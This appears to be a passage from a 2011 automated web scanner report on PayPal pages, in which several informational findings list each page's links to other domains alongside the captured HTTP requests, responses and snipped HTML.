<div class="loading_message"><img src="https://www.paypalobjects.com/en_US/i/icon/icon_animated_prog_42wx42h.gif" border="0" alt="">We're finding answers...</div>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/agent.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/curd.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.4. https://www.paypal.com/cgi-bin/helpweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/helpweb

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/cgi-bin/helpweb?cmd=_help

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-community.com/t5/us/ct-p/us
https://www.paypal-labs.com/
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/global.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/print.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/hc1.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/hc1_chrome.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/hc1.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/yui/element.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.x.com/
https://www1.paypal-virtualchat.com/

Request

GET /cgi-bin/helpweb?cmd=_help HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gzip, deflate
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=BbyMaXKL52sABwxakQNx00O3wkD1Wj_4h7pMNyNrIpB8QHnXzjmot4-Bam9KAQfUGtD5HEoWfR2gBNP5JPXn64lk3ri_MzF5M2BISsNUBmPrWxrcTMX6TYeMV__TjgtUb6_15G%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112195; navcmd=_registration-run; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=mBZummYRqWAaA52FK1uV3MMXLOHRD-DHmSjyJLU8i7KEY_HFWzNKESTeg-tp9AovhbDBh_KVhORs4ITxcfZG9IWV0T1meKyv4ByGQPJuc_Lk2GePfePU0VzB62i1Ig2tFVmu-P9KL4OOOoQptHQ3dtyI7lYtxh9nM-P_5oWKLGvxCEN4AdS-TxcJmcg-y0fQbQOvWdpNybDBxJYs_q3cfK8Fm6Pw2ApX-ooXWe_K7msbsfUzIGSvtcnyuhERieDgL-cTiqTje1fF1nDp8wxnusbEqApoEEQra-NI_qAUNB9gU4stHax9r8WsdONjUZbhqzEVyYcEjkyVBrkLLsQTvFDs_-weqmuVjgtzHIqwdoSKOaA2; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0
Host: www.paypal.com
Connection: Keep-Alive
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:23:23 GMT
Server: Apache
Set-Cookie: help_cookie=; expires=Sun, 18-Sep-2011 13:23:25 GMT; domain=paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_help%20b%200%20%20c%207%20helpscr%20d%200%20%20e%200%20%20f%200%20%20g%205%20en_US%20h%200%20%20i%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20j%200%20%20k%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20l%200%20%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 178803

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/global.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/hc1.css">

<link media="screen" rel="stylesheet" type="text/chrome" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/hc1_chrome.css">

<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/print.css"><style type="text/css">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"></head>
...[SNIP]...
<div id="hc_callout_left_content"><a target="_blank" href="https://www1.paypal-virtualchat.com" onClick="javascript:virtualWin=openVirtualWin('https://www1.paypal-virtualchat.com', virtualWin)">Ask Sarah</a>
...[SNIP]...
<div id="hc_callout_right_content"><a href="https://www.paypal-community.com/t5/us/ct-p/us" id="cllt">Community Help Forum</a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/yui/element.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/hc1.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.5. https://www.paypal.com/cgi-bin/marketingweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/marketingweb

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/cgi-bin/marketingweb?cmd=_home-general&nav=0

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/js/tns/min/bid.js
https://www.x.com/

Request

GET /cgi-bin/marketingweb?cmd=_home-general&nav=0 HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:47:19 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:47:20 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2013%20_home-general%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fMarketing_CommandDriven%2fhomepage%2fMainHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2063%20Send%20Money%2c%20Pay%20Online%20or%20Set%20Up%20a%20Merchant%20Account%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24755

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="all" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css">

<link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"></head>
...[SNIP]...
href=https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49775&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUw><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg' border='0' alt=''/></a>
...[SNIP]...
</div><img src="https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif" border="0" class="dottedline" alt=""><p class="acceptCredit">
...[SNIP]...
href=https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49777&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUQ><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif' border='0' alt=''/></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<a target="_blank" href="https://www.paypal.com/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.6. https://www.paypal.com/cgi-bin/searchscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/searchscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/cgi-bin/searchscr?cmd=_sitewide-search

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-labs.com/
https://www.x.com/

Request

GET /cgi-bin/searchscr?cmd=_sitewide-search HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:47:17 GMT
Server: Apache
Set-Cookie: feel_cookie=a%2016%20_sitewide-search%20b%205%20_help%20c%209%20searchscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2042%20xpt%2fCustomer%2fgeneral%2fSearchResultsRedesign%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2023%20Search%20Results%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11565

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.7. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/cgi-bin/webscr?cmd=_home-general&nav=0

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://securepics.ebaystatic.com/aw/pics/paypal/site/US/img_NA_NA00156_africa_en_us_542x228.jpg
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/js/tns/min/bid.js
https://www.x.com/

Request

GET /cgi-bin/webscr?cmd=_home-general&nav=0 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.paypal.com
Connection: Keep-Alive
Cookie: Apache=10.190.9.182.1313112145907951; cwrClyrK4LoCV1fydGbAxiNL6iG=BbyMaXKL52sABwxakQNx00O3wkD1Wj_4h7pMNyNrIpB8QHnXzjmot4-Bam9KAQfUGtD5HEoWfR2gBNP5JPXn64lk3ri_MzF5M2BISsNUBmPrWxrcTMX6TYeMV__TjgtUb6_15G%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313112195; navcmd=_registration-run; pNTcMTtQfrJuaJiwEnWXQ6yNxfq=mBZummYRqWAaA52FK1uV3MMXLOHRD-DHmSjyJLU8i7KEY_HFWzNKESTeg-tp9AovhbDBh_KVhORs4ITxcfZG9IWV0T1meKyv4ByGQPJuc_Lk2GePfePU0VzB62i1Ig2tFVmu-P9KL4OOOoQptHQ3dtyI7lYtxh9nM-P_5oWKLGvxCEN4AdS-TxcJmcg-y0fQbQOvWdpNybDBxJYs_q3cfK8Fm6Pw2ApX-ooXWe_K7msbsfUzIGSvtcnyuhERieDgL-cTiqTje1fF1nDp8wxnusbEqApoEEQra-NI_qAUNB9gU4stHax9r8WsdONjUZbhqzEVyYcEjkyVBrkLLsQTvFDs_-weqmuVjgtzHIqwdoSKOaA2; KHcl0EuY7AKSMgfvHl7J5E7hPtK=ST3y3Iw9S565SZinIAGKcJZFrmQ4AAlG4kUTV6c4B_buhBjHckuBGvqZh9nhOaGpKgI7-mRZkucmxeTt; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; help_cookie=

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:23:29 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 01:23:30 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2013%20_home-general%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fMarketing_CommandDriven%2fhomepage%2fMainHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2063%20Send%20Money%2c%20Pay%20Online%20or%20Set%20Up%20a%20Merchant%20Account%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 24771

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="all" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css">

<link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"></head>
...[SNIP]...
href=https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=9607&oid=51638&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEdUbQ5jRXNWYlRFVg><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/US/img_NA_NA00156_africa_en_us_542x228.jpg' border='0' alt=''/></a>
...[SNIP]...
</div><img src="https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif" border="0" class="dottedline" alt=""><p class="acceptCredit">
...[SNIP]...
href=https://www.paypal.com/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49777&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUQ><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif' border='0' alt=''/></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<a target="_blank" href="https://www.paypal.com/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.8. https://www.paypal.com/cgi-bin/webscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/cgi-bin/webscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/cgi-bin/webscr?cmd=_flow&SESSION=M5rZd4ZZP2gDMdA2Lu9sOXevrynrQioy9AyKX2bWrhn8uW2M5rNBXVN3X5S&dispatch=5885d80a13c0db1f8e263663d3faee8d1e83f46a36995b3856cef1e18897ad75

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/global.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/print.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/flows/flowAuthentication.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/logo/paypal_x_logo_200x38.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.x.com/index.jspa?ssocancel=true&token=HA-KJ8ZLGBZ3CZ96

Request

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:40:17 GMT
Server: Apache
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:40:18 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_flow%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2030%20xpt%2fCustomer%2fgeneral%2fLoginAuth%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2024%20Log%20in%20to%20x.com%20-%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Cache-Control: must-revalidate, proxy-revalidate, no-cache
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 14473

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
